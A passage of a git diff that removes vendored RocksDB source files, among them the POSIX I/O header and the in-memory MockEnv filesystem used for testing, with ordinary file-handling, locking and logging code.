-Status PosixDirectory::Fsync() {
-#ifndef OS_AIX
-  if (fsync(fd_) == -1) {
-    return IOError("While fsync", "a directory", errno);
-  }
-#endif
-  return Status::OK();
-}
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/env/io_posix.h b/thirdparty/rocksdb/env/io_posix.h
deleted file mode 100644
index 69c9843..0000000
--- a/thirdparty/rocksdb/env/io_posix.h
+++ /dev/null
@@ -1,248 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-#include <errno.h>
-#include <unistd.h>
-#include <atomic>
-#include <string>
-#include "rocksdb/env.h"
-
-// For non linux platform, the following macros are used only as place
-// holder.
-#if !(defined OS_LINUX) && !(defined CYGWIN) && !(defined OS_AIX)
-#define POSIX_FADV_NORMAL 0     /* [MC1] no further special treatment */
-#define POSIX_FADV_RANDOM 1     /* [MC1] expect random page refs */
-#define POSIX_FADV_SEQUENTIAL 2 /* [MC1] expect sequential page refs */
-#define POSIX_FADV_WILLNEED 3   /* [MC1] will need these pages */
-#define POSIX_FADV_DONTNEED 4   /* [MC1] dont need these pages */
-#endif
-
-namespace rocksdb {
-static std::string IOErrorMsg(const std::string& context,
-                              const std::string& file_name) {
-  if (file_name.empty()) {
-    return context;
-  }
-  return context + ": " + file_name;
-}
-
-// file_name can be left empty if it is not unkown.
-static Status IOError(const std::string& context, const std::string& file_name,
-                      int err_number) {
-  switch (err_number) {
-  case ENOSPC:
-    return Status::NoSpace(IOErrorMsg(context, file_name),
-                           strerror(err_number));
-  case ESTALE:
-    return Status::IOError(Status::kStaleFile);
-  default:
-    return Status::IOError(IOErrorMsg(context, file_name),
-                           strerror(err_number));
-  }
-}
-
-class PosixHelper {
- public:
-  static size_t GetUniqueIdFromFile(int fd, char* id, size_t max_size);
-};
-
-class PosixSequentialFile : public SequentialFile {
- private:
-  std::string filename_;
-  FILE* file_;
-  int fd_;
-  bool use_direct_io_;
-  size_t logical_sector_size_;
-
- public:
-  PosixSequentialFile(const std::string& fname, FILE* file, int fd,
-                      const EnvOptions& options);
-  virtual ~PosixSequentialFile();
-
-  virtual Status Read(size_t n, Slice* result, char* scratch) override;
-  virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result,
-                                char* scratch) override;
-  virtual Status Skip(uint64_t n) override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-  virtual bool use_direct_io() const override { return use_direct_io_; }
-  virtual size_t GetRequiredBufferAlignment() const override {
-    return logical_sector_size_;
-  }
-};
-
-class PosixRandomAccessFile : public RandomAccessFile {
- protected:
-  std::string filename_;
-  int fd_;
-  bool use_direct_io_;
-  size_t logical_sector_size_;
-
- public:
-  PosixRandomAccessFile(const std::string& fname, int fd,
-                        const EnvOptions& options);
-  virtual ~PosixRandomAccessFile();
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual Status Prefetch(uint64_t offset, size_t n) override;
-
-#if defined(OS_LINUX) || defined(OS_MACOSX) || defined(OS_AIX)
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-#endif
-  virtual void Hint(AccessPattern pattern) override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-  virtual bool use_direct_io() const override { return use_direct_io_; }
-  virtual size_t GetRequiredBufferAlignment() const override {
-    return logical_sector_size_;
-  }
-};
-
-class PosixWritableFile : public WritableFile {
- protected:
-  const std::string filename_;
-  const bool use_direct_io_;
-  int fd_;
-  uint64_t filesize_;
-  size_t logical_sector_size_;
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  bool allow_fallocate_;
-  bool fallocate_with_keep_size_;
-#endif
-
- public:
-  explicit PosixWritableFile(const std::string& fname, int fd,
-                             const EnvOptions& options);
-  virtual ~PosixWritableFile();
-
-  // Need to implement this so the file is truncated correctly
-  // with direct I/O
-  virtual Status Truncate(uint64_t size) override;
-  virtual Status Close() override;
-  virtual Status Append(const Slice& data) override;
-  virtual Status PositionedAppend(const Slice& data, uint64_t offset) override;
-  virtual Status Flush() override;
-  virtual Status Sync() override;
-  virtual Status Fsync() override;
-  virtual bool IsSyncThreadSafe() const override;
-  virtual bool use_direct_io() const override { return use_direct_io_; }
-  virtual uint64_t GetFileSize() override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-  virtual size_t GetRequiredBufferAlignment() const override {
-    return logical_sector_size_;
-  }
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  virtual Status Allocate(uint64_t offset, uint64_t len) override;
-#endif
-#ifdef ROCKSDB_RANGESYNC_PRESENT
-  virtual Status RangeSync(uint64_t offset, uint64_t nbytes) override;
-#endif
-#ifdef OS_LINUX
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-#endif
-};
-
-// mmap() based random-access
-class PosixMmapReadableFile : public RandomAccessFile {
- private:
-  int fd_;
-  std::string filename_;
-  void* mmapped_region_;
-  size_t length_;
-
- public:
-  PosixMmapReadableFile(const int fd, const std::string& fname, void* base,
-                        size_t length, const EnvOptions& options);
-  virtual ~PosixMmapReadableFile();
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-};
-
-class PosixMmapFile : public WritableFile {
- private:
-  std::string filename_;
-  int fd_;
-  size_t page_size_;
-  size_t map_size_;       // How much extra memory to map at a time
-  char* base_;            // The mapped region
-  char* limit_;           // Limit of the mapped region
-  char* dst_;             // Where to write next  (in range [base_,limit_])
-  char* last_sync_;       // Where have we synced up to
-  uint64_t file_offset_;  // Offset of base_ in file
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  bool allow_fallocate_;  // If false, fallocate calls are bypassed
-  bool fallocate_with_keep_size_;
-#endif
-
-  // Roundup x to a multiple of y
-  static size_t Roundup(size_t x, size_t y) { return ((x + y - 1) / y) * y; }
-
-  size_t TruncateToPageBoundary(size_t s) {
-    s -= (s & (page_size_ - 1));
-    assert((s % page_size_) == 0);
-    return s;
-  }
-
-  Status MapNewRegion();
-  Status UnmapCurrentRegion();
-  Status Msync();
-
- public:
-  PosixMmapFile(const std::string& fname, int fd, size_t page_size,
-                const EnvOptions& options);
-  ~PosixMmapFile();
-
-  // Means Close() will properly take care of truncate
-  // and it does not need any additional information
-  virtual Status Truncate(uint64_t size) override { return Status::OK(); }
-  virtual Status Close() override;
-  virtual Status Append(const Slice& data) override;
-  virtual Status Flush() override;
-  virtual Status Sync() override;
-  virtual Status Fsync() override;
-  virtual uint64_t GetFileSize() override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  virtual Status Allocate(uint64_t offset, uint64_t len) override;
-#endif
-};
-
-class PosixRandomRWFile : public RandomRWFile {
- public:
-  explicit PosixRandomRWFile(const std::string& fname, int fd,
-                             const EnvOptions& options);
-  virtual ~PosixRandomRWFile();
-
-  virtual Status Write(uint64_t offset, const Slice& data) override;
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual Status Flush() override;
-  virtual Status Sync() override;
-  virtual Status Fsync() override;
-  virtual Status Close() override;
-
- private:
-  const std::string filename_;
-  int fd_;
-};
-
-class PosixDirectory : public Directory {
- public:
-  explicit PosixDirectory(int fd) : fd_(fd) {}
-  ~PosixDirectory();
-  virtual Status Fsync() override;
-
- private:
-  int fd_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/mock_env.cc b/thirdparty/rocksdb/env/mock_env.cc
deleted file mode 100644
index 669011c..0000000
--- a/thirdparty/rocksdb/env/mock_env.cc
+++ /dev/null
@@ -1,799 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "env/mock_env.h"
-#include <algorithm>
-#include <chrono>
-#include "port/sys_time.h"
-#include "util/cast_util.h"
-#include "util/murmurhash.h"
-#include "util/random.h"
-#include "util/rate_limiter.h"
-
-namespace rocksdb {
-
-class MemFile {
- public:
-  explicit MemFile(Env* env, const std::string& fn, bool _is_lock_file = false)
-      : env_(env),
-        fn_(fn),
-        refs_(0),
-        is_lock_file_(_is_lock_file),
-        locked_(false),
-        size_(0),
-        modified_time_(Now()),
-        rnd_(static_cast<uint32_t>(
-            MurmurHash(fn.data(), static_cast<int>(fn.size()), 0))),
-        fsynced_bytes_(0) {}
-
-  void Ref() {
-    MutexLock lock(&mutex_);
-    ++refs_;
-  }
-
-  bool is_lock_file() const { return is_lock_file_; }
-
-  bool Lock() {
-    assert(is_lock_file_);
-    MutexLock lock(&mutex_);
-    if (locked_) {
-      return false;
-    } else {
-      locked_ = true;
-      return true;
-    }
-  }
-
-  void Unlock() {
-    assert(is_lock_file_);
-    MutexLock lock(&mutex_);
-    locked_ = false;
-  }
-
-  void Unref() {
-    bool do_delete = false;
-    {
-      MutexLock lock(&mutex_);
-      --refs_;
-      assert(refs_ >= 0);
-      if (refs_ <= 0) {
-        do_delete = true;
-      }
-    }
-
-    if (do_delete) {
-      delete this;
-    }
-  }
-
-  uint64_t Size() const {
-    return size_;
-  }
-
-  void Truncate(size_t size) {
-    MutexLock lock(&mutex_);
-    if (size < size_) {
-      data_.resize(size);
-      size_ = size;
-    }
-  }
-
-  void CorruptBuffer() {
-    if (fsynced_bytes_ >= size_) {
-      return;
-    }
-    uint64_t buffered_bytes = size_ - fsynced_bytes_;
-    uint64_t start =
-        fsynced_bytes_ + rnd_.Uniform(static_cast<int>(buffered_bytes));
-    uint64_t end = std::min(start + 512, size_.load());
-    MutexLock lock(&mutex_);
-    for (uint64_t pos = start; pos < end; ++pos) {
-      data_[pos] = static_cast<char>(rnd_.Uniform(256));
-    }
-  }
-
-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const {
-    MutexLock lock(&mutex_);
-    const uint64_t available = Size() - std::min(Size(), offset);
-    if (n > available) {
-      n = available;
-    }
-    if (n == 0) {
-      *result = Slice();
-      return Status::OK();
-    }
-    if (scratch) {
-      memcpy(scratch, &(data_[offset]), n);
-      *result = Slice(scratch, n);
-    } else {
-      *result = Slice(&(data_[offset]), n);
-    }
-    return Status::OK();
-  }
-
-  Status Write(uint64_t offset, const Slice& data) {
-    MutexLock lock(&mutex_);
-    if (offset + data.size() > data_.size()) {
-      data_.resize(offset + data.size());
-    }
-    data_.replace(offset, data.size(), data.data(), data.size());
-    size_ = data_.size();
-    modified_time_ = Now();
-    return Status::OK();
-  }
-
-  Status Append(const Slice& data) {
-    MutexLock lock(&mutex_);
-    data_.append(data.data(), data.size());
-    size_ = data_.size();
-    modified_time_ = Now();
-    return Status::OK();
-  }
-
-  Status Fsync() {
-    fsynced_bytes_ = size_.load();
-    return Status::OK();
-  }
-
-  uint64_t ModifiedTime() const {
-    return modified_time_;
-  }
-
- private:
-  uint64_t Now() {
-    int64_t unix_time = 0;
-    auto s = env_->GetCurrentTime(&unix_time);
-    assert(s.ok());
-    return static_cast<uint64_t>(unix_time);
-  }
-
-  // Private since only Unref() should be used to delete it.
-  ~MemFile() {
-    assert(refs_ == 0);
-  }
-
-  // No copying allowed.
-  MemFile(const MemFile&);
-  void operator=(const MemFile&);
-
-  Env* env_;
-  const std::string fn_;
-  mutable port::Mutex mutex_;
-  int refs_;
-  bool is_lock_file_;
-  bool locked_;
-
-  // Data written into this file, all bytes before fsynced_bytes are
-  // persistent.
-  std::string data_;
-  std::atomic<uint64_t> size_;
-  std::atomic<uint64_t> modified_time_;
-
-  Random rnd_;
-  std::atomic<uint64_t> fsynced_bytes_;
-};
-
-namespace {
-
-class MockSequentialFile : public SequentialFile {
- public:
-  explicit MockSequentialFile(MemFile* file) : file_(file), pos_(0) {
-    file_->Ref();
-  }
-
-  ~MockSequentialFile() {
-    file_->Unref();
-  }
-
-  virtual Status Read(size_t n, Slice* result, char* scratch) override {
-    Status s = file_->Read(pos_, n, result, scratch);
-    if (s.ok()) {
-      pos_ += result->size();
-    }
-    return s;
-  }
-
-  virtual Status Skip(uint64_t n) override {
-    if (pos_ > file_->Size()) {
-      return Status::IOError("pos_ > file_->Size()");
-    }
-    const size_t available = file_->Size() - pos_;
-    if (n > available) {
-      n = available;
-    }
-    pos_ += n;
-    return Status::OK();
-  }
-
- private:
-  MemFile* file_;
-  size_t pos_;
-};
-
-class MockRandomAccessFile : public RandomAccessFile {
- public:
-  explicit MockRandomAccessFile(MemFile* file) : file_(file) {
-    file_->Ref();
-  }
-
-  ~MockRandomAccessFile() {
-    file_->Unref();
-  }
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override {
-    return file_->Read(offset, n, result, scratch);
-  }
-
- private:
-  MemFile* file_;
-};
-
-class MockRandomRWFile : public RandomRWFile {
- public:
-  explicit MockRandomRWFile(MemFile* file) : file_(file) { file_->Ref(); }
-
-  ~MockRandomRWFile() { file_->Unref(); }
-
-  virtual Status Write(uint64_t offset, const Slice& data) override {
-    return file_->Write(offset, data);
-  }
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override {
-    return file_->Read(offset, n, result, scratch);
-  }
-
-  virtual Status Close() override { return file_->Fsync(); }
-
-  virtual Status Flush() override { return Status::OK(); }
-
-  virtual Status Sync() override { return file_->Fsync(); }
-
- private:
-  MemFile* file_;
-};
-
-class MockWritableFile : public WritableFile {
- public:
-  MockWritableFile(MemFile* file, RateLimiter* rate_limiter)
-    : file_(file),
-      rate_limiter_(rate_limiter) {
-    file_->Ref();
-  }
-
-  ~MockWritableFile() {
-    file_->Unref();
-  }
-
-  virtual Status Append(const Slice& data) override {
-    uint64_t bytes_written = 0;
-    while (bytes_written < data.size()) {
-      auto bytes = RequestToken(data.size() - bytes_written);
-      Status s = file_->Append(Slice(data.data() + bytes_written, bytes));
-      if (!s.ok()) {
-        return s;
-      }
-      bytes_written += bytes;
-    }
-    return Status::OK();
-  }
-  virtual Status Truncate(uint64_t size) override {
-    file_->Truncate(size);
-    return Status::OK();
-  }
-  virtual Status Close() override { return file_->Fsync(); }
-
-  virtual Status Flush() override { return Status::OK(); }
-
-  virtual Status Sync() override { return file_->Fsync(); }
-
-  virtual uint64_t GetFileSize() override { return file_->Size(); }
-
- private:
-  inline size_t RequestToken(size_t bytes) {
-    if (rate_limiter_ && io_priority_ < Env::IO_TOTAL) {
-      bytes = std::min(bytes,
-          static_cast<size_t>(rate_limiter_->GetSingleBurstBytes()));
-      rate_limiter_->Request(bytes, io_priority_);
-    }
-    return bytes;
-  }
-
-  MemFile* file_;
-  RateLimiter* rate_limiter_;
-};
-
-class MockEnvDirectory : public Directory {
- public:
-  virtual Status Fsync() override { return Status::OK(); }
-};
-
-class MockEnvFileLock : public FileLock {
- public:
-  explicit MockEnvFileLock(const std::string& fname)
-    : fname_(fname) {}
-
-  std::string FileName() const {
-    return fname_;
-  }
-
- private:
-  const std::string fname_;
-};
-
-class TestMemLogger : public Logger {
- private:
-  std::unique_ptr<WritableFile> file_;
-  std::atomic_size_t log_size_;
-  static const uint64_t flush_every_seconds_ = 5;
-  std::atomic_uint_fast64_t last_flush_micros_;
-  Env* env_;
-  bool flush_pending_;
-
- public:
-  TestMemLogger(std::unique_ptr<WritableFile> f, Env* env,
-                const InfoLogLevel log_level = InfoLogLevel::ERROR_LEVEL)
-      : Logger(log_level),
-        file_(std::move(f)),
-        log_size_(0),
-        last_flush_micros_(0),
-        env_(env),
-        flush_pending_(false) {}
-  virtual ~TestMemLogger() {
-  }
-
-  virtual void Flush() override {
-    if (flush_pending_) {
-      flush_pending_ = false;
-    }
-    last_flush_micros_ = env_->NowMicros();
-  }
-
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    // We try twice: the first time with a fixed-size stack allocated buffer,
-    // and the second time with a much larger dynamically allocated buffer.
-    char buffer[500];
-    for (int iter = 0; iter < 2; iter++) {
-      char* base;
-      int bufsize;
-      if (iter == 0) {
-        bufsize = sizeof(buffer);
-        base = buffer;
-      } else {
-        bufsize = 30000;
-        base = new char[bufsize];
-      }
-      char* p = base;
-      char* limit = base + bufsize;
-
-      struct timeval now_tv;
-      gettimeofday(&now_tv, nullptr);
-      const time_t seconds = now_tv.tv_sec;
-      struct tm t;
-      memset(&t, 0, sizeof(t));
-      auto ret __attribute__((__unused__)) = localtime_r(&seconds, &t);
-      assert(ret);
-      p += snprintf(p, limit - p,
-                    "%04d/%02d/%02d-%02d:%02d:%02d.%06d ",
-                    t.tm_year + 1900,
-                    t.tm_mon + 1,
-                    t.tm_mday,
-                    t.tm_hour,
-                    t.tm_min,
-                    t.tm_sec,
-                    static_cast<int>(now_tv.tv_usec));
-
-      // Print the message
-      if (p < limit) {
-        va_list backup_ap;
-        va_copy(backup_ap, ap);
-        p += vsnprintf(p, limit - p, format, backup_ap);
-        va_end(backup_ap);
-      }
-
-      // Truncate to available space if necessary
-      if (p >= limit) {
-        if (iter == 0) {
-          continue;       // Try again with larger buffer
-        } else {
-          p = limit - 1;
-        }
-      }
-
-      // Add newline if necessary
-      if (p == base || p[-1] != '\n') {
-        *p++ = '\n';
-      }
-
-      assert(p <= limit);
-      const size_t write_size = p - base;
-
-      file_->Append(Slice(base, write_size));
-      flush_pending_ = true;
-      log_size_ += write_size;
-      uint64_t now_micros = static_cast<uint64_t>(now_tv.tv_sec) * 1000000 +
-        now_tv.tv_usec;
-      if (now_micros - last_flush_micros_ >= flush_every_seconds_ * 1000000) {
-        flush_pending_ = false;
-        last_flush_micros_ = now_micros;
-      }
-      if (base != buffer) {
-        delete[] base;
-      }
-      break;
-    }
-  }
-  size_t GetLogFileSize() const override { return log_size_; }
-};
-
-}  // Anonymous namespace
-
-MockEnv::MockEnv(Env* base_env) : EnvWrapper(base_env), fake_sleep_micros_(0) {}
-
-MockEnv::~MockEnv() {
-  for (FileSystem::iterator i = file_map_.begin(); i != file_map_.end(); ++i) {
-    i->second->Unref();
-  }
-}
-
-  // Partial implementation of the Env interface.
-Status MockEnv::NewSequentialFile(const std::string& fname,
-                                     unique_ptr<SequentialFile>* result,
-                                     const EnvOptions& soptions) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) == file_map_.end()) {
-    *result = NULL;
-    return Status::IOError(fn, "File not found");
-  }
-  auto* f = file_map_[fn];
-  if (f->is_lock_file()) {
-    return Status::InvalidArgument(fn, "Cannot open a lock file.");
-  }
-  result->reset(new MockSequentialFile(f));
-  return Status::OK();
-}
-
-Status MockEnv::NewRandomAccessFile(const std::string& fname,
-                                       unique_ptr<RandomAccessFile>* result,
-                                       const EnvOptions& soptions) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) == file_map_.end()) {
-    *result = NULL;
-    return Status::IOError(fn, "File not found");
-  }
-  auto* f = file_map_[fn];
-  if (f->is_lock_file()) {
-    return Status::InvalidArgument(fn, "Cannot open a lock file.");
-  }
-  result->reset(new MockRandomAccessFile(f));
-  return Status::OK();
-}
-
-Status MockEnv::NewRandomRWFile(const std::string& fname,
-                                unique_ptr<RandomRWFile>* result,
-                                const EnvOptions& soptions) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) == file_map_.end()) {
-    *result = NULL;
-    return Status::IOError(fn, "File not found");
-  }
-  auto* f = file_map_[fn];
-  if (f->is_lock_file()) {
-    return Status::InvalidArgument(fn, "Cannot open a lock file.");
-  }
-  result->reset(new MockRandomRWFile(f));
-  return Status::OK();
-}
-
-Status MockEnv::ReuseWritableFile(const std::string& fname,
-                                  const std::string& old_fname,
-                                  unique_ptr<WritableFile>* result,
-                                  const EnvOptions& options) {
-  auto s = RenameFile(old_fname, fname);
-  if (!s.ok()) {
-    return s;
-  }
-  result->reset();
-  return NewWritableFile(fname, result, options);
-}
-
-Status MockEnv::NewWritableFile(const std::string& fname,
-                                unique_ptr<WritableFile>* result,
-                                const EnvOptions& env_options) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) != file_map_.end()) {
-    DeleteFileInternal(fn);
-  }
-  MemFile* file = new MemFile(this, fn, false);
-  file->Ref();
-  file_map_[fn] = file;
-
-  result->reset(new MockWritableFile(file, env_options.rate_limiter));
-  return Status::OK();
-}
-
-Status MockEnv::NewDirectory(const std::string& name,
-                                unique_ptr<Directory>* result) {
-  result->reset(new MockEnvDirectory());
-  return Status::OK();
-}
-
-Status MockEnv::FileExists(const std::string& fname) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) != file_map_.end()) {
-    // File exists
-    return Status::OK();
-  }
-  // Now also check if fn exists as a dir
-  for (const auto& iter : file_map_) {
-    const std::string& filename = iter.first;
-    if (filename.size() >= fn.size() + 1 &&
-        filename[fn.size()] == '/' &&
-        Slice(filename).starts_with(Slice(fn))) {
-      return Status::OK();
-    }
-  }
-  return Status::NotFound();
-}
-
-Status MockEnv::GetChildren(const std::string& dir,
-                               std::vector<std::string>* result) {
-  auto d = NormalizePath(dir);
-  bool found_dir = false;
-  {
-    MutexLock lock(&mutex_);
-    result->clear();
-    for (const auto& iter : file_map_) {
-      const std::string& filename = iter.first;
-
-      if (filename == d) {
-        found_dir = true;
-      } else if (filename.size() >= d.size() + 1 && filename[d.size()] == '/' &&
-                 Slice(filename).starts_with(Slice(d))) {
-        found_dir = true;
-        size_t next_slash = filename.find('/', d.size() + 1);
-        if (next_slash != std::string::npos) {
-          result->push_back(filename.substr(
-                d.size() + 1, next_slash - d.size() - 1));
-        } else {
-          result->push_back(filename.substr(d.size() + 1));
-        }
-      }
-    }
-  }
-  result->erase(std::unique(result->begin(), result->end()), result->end());
-  return found_dir ? Status::OK() : Status::NotFound();
-}
-
-void MockEnv::DeleteFileInternal(const std::string& fname) {
-  assert(fname == NormalizePath(fname));
-  const auto& pair = file_map_.find(fname);
-  if (pair != file_map_.end()) {
-    pair->second->Unref();
-    file_map_.erase(fname);
-  }
-}
-
-Status MockEnv::DeleteFile(const std::string& fname) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-
-  DeleteFileInternal(fn);
-  return Status::OK();
-}
-
-Status MockEnv::CreateDir(const std::string& dirname) {
-  auto dn = NormalizePath(dirname);
-  if (file_map_.find(dn) == file_map_.end()) {
-    MemFile* file = new MemFile(this, dn, false);
-    file->Ref();
-    file_map_[dn] = file;
-  } else {
-    return Status::IOError();
-  }
-  return Status::OK();
-}
-
-Status MockEnv::CreateDirIfMissing(const std::string& dirname) {
-  CreateDir(dirname);
-  return Status::OK();
-}
-
-Status MockEnv::DeleteDir(const std::string& dirname) {
-  return DeleteFile(dirname);
-}
-
-Status MockEnv::GetFileSize(const std::string& fname, uint64_t* file_size) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  if (iter == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-
-  *file_size = iter->second->Size();
-  return Status::OK();
-}
-
-Status MockEnv::GetFileModificationTime(const std::string& fname,
-                                           uint64_t* time) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  if (iter == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-  *time = iter->second->ModifiedTime();
-  return Status::OK();
-}
-
-Status MockEnv::RenameFile(const std::string& src, const std::string& dest) {
-  auto s = NormalizePath(src);
-  auto t = NormalizePath(dest);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(s) == file_map_.end()) {
-    return Status::IOError(s, "File not found");
-  }
-
-  DeleteFileInternal(t);
-  file_map_[t] = file_map_[s];
-  file_map_.erase(s);
-  return Status::OK();
-}
-
-Status MockEnv::LinkFile(const std::string& src, const std::string& dest) {
-  auto s = NormalizePath(src);
-  auto t = NormalizePath(dest);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(s) == file_map_.end()) {
-    return Status::IOError(s, "File not found");
-  }
-
-  DeleteFileInternal(t);
-  file_map_[t] = file_map_[s];
-  file_map_[t]->Ref();  // Otherwise it might get deleted when noone uses s
-  return Status::OK();
-}
-
-Status MockEnv::NewLogger(const std::string& fname,
-                             shared_ptr<Logger>* result) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  MemFile* file = nullptr;
-  if (iter == file_map_.end()) {
-    file = new MemFile(this, fn, false);
-    file->Ref();
-    file_map_[fn] = file;
-  } else {
-    file = iter->second;
-  }
-  std::unique_ptr<WritableFile> f(new MockWritableFile(file, nullptr));
-  result->reset(new TestMemLogger(std::move(f), this));
-  return Status::OK();
-}
-
-Status MockEnv::LockFile(const std::string& fname, FileLock** flock) {
-  auto fn = NormalizePath(fname);
-  {
-    MutexLock lock(&mutex_);
-    if (file_map_.find(fn) != file_map_.end()) {
-      if (!file_map_[fn]->is_lock_file()) {
-        return Status::InvalidArgument(fname, "Not a lock file.");
-      }
-      if (!file_map_[fn]->Lock()) {
-        return Status::IOError(fn, "Lock is already held.");
-      }
-    } else {
-      auto* file = new MemFile(this, fn, true);
-      file->Ref();
-      file->Lock();
-      file_map_[fn] = file;
-    }
-  }
-  *flock = new MockEnvFileLock(fn);
-  return Status::OK();
-}
-
-Status MockEnv::UnlockFile(FileLock* flock) {
-  std::string fn =
-      static_cast_with_check<MockEnvFileLock, FileLock>(flock)->FileName();
-  {
-    MutexLock lock(&mutex_);
-    if (file_map_.find(fn) != file_map_.end()) {
-      if (!file_map_[fn]->is_lock_file()) {
-        return Status::InvalidArgument(fn, "Not a lock file.");
-      }
-      file_map_[fn]->Unlock();
-    }
-  }
-  delete flock;
-  return Status::OK();
-}
-
-Status MockEnv::GetTestDirectory(std::string* path) {
-  *path = "/test";
-  return Status::OK();
-}
-
-Status MockEnv::GetCurrentTime(int64_t* unix_time) {
-  auto s = EnvWrapper::GetCurrentTime(unix_time);
-  if (s.ok()) {
-    *unix_time += fake_sleep_micros_.load() / (1000 * 1000);
-  }
-  return s;
-}
-
-uint64_t MockEnv::NowMicros() {
-  return EnvWrapper::NowMicros() + fake_sleep_micros_.load();
-}
-
-uint64_t MockEnv::NowNanos() {
-  return EnvWrapper::NowNanos() + fake_sleep_micros_.load() * 1000;
-}
-
-// Non-virtual functions, specific to MockEnv
-Status MockEnv::Truncate(const std::string& fname, size_t size) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  if (iter == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-  iter->second->Truncate(size);
-  return Status::OK();
-}
-
-Status MockEnv::CorruptBuffer(const std::string& fname) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  if (iter == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-  iter->second->CorruptBuffer();
-  return Status::OK();
-}
-
-std::string MockEnv::NormalizePath(const std::string path) {
-  std::string dst;
-  for (auto c : path) {
-    if (!dst.empty() && c == '/' && dst.back() == '/') {
-      continue;
-    }
-    dst.push_back(c);
-  }
-  return dst;
-}
-
-void MockEnv::FakeSleepForMicroseconds(int64_t micros) {
-  fake_sleep_micros_.fetch_add(micros);
-}
-
-#ifndef ROCKSDB_LITE
-// This is to maintain the behavior before swithcing from InMemoryEnv to MockEnv
-Env* NewMemEnv(Env* base_env) { return new MockEnv(base_env); }
-
-#else  // ROCKSDB_LITE
-
-Env* NewMemEnv(Env* base_env) { return nullptr; }
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/mock_env.h b/thirdparty/rocksdb/env/mock_env.h
deleted file mode 100644
index ba1e5fa..0000000
--- a/thirdparty/rocksdb/env/mock_env.h
+++ /dev/null
@@ -1,115 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <map>
-#include <string>
-#include <vector>
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-#include "port/port.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-class MemFile;
-class MockEnv : public EnvWrapper {
- public:
-  explicit MockEnv(Env* base_env);
-
-  virtual ~MockEnv();
-
-  // Partial implementation of the Env interface.
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& soptions) override;
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& soptions) override;
-
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
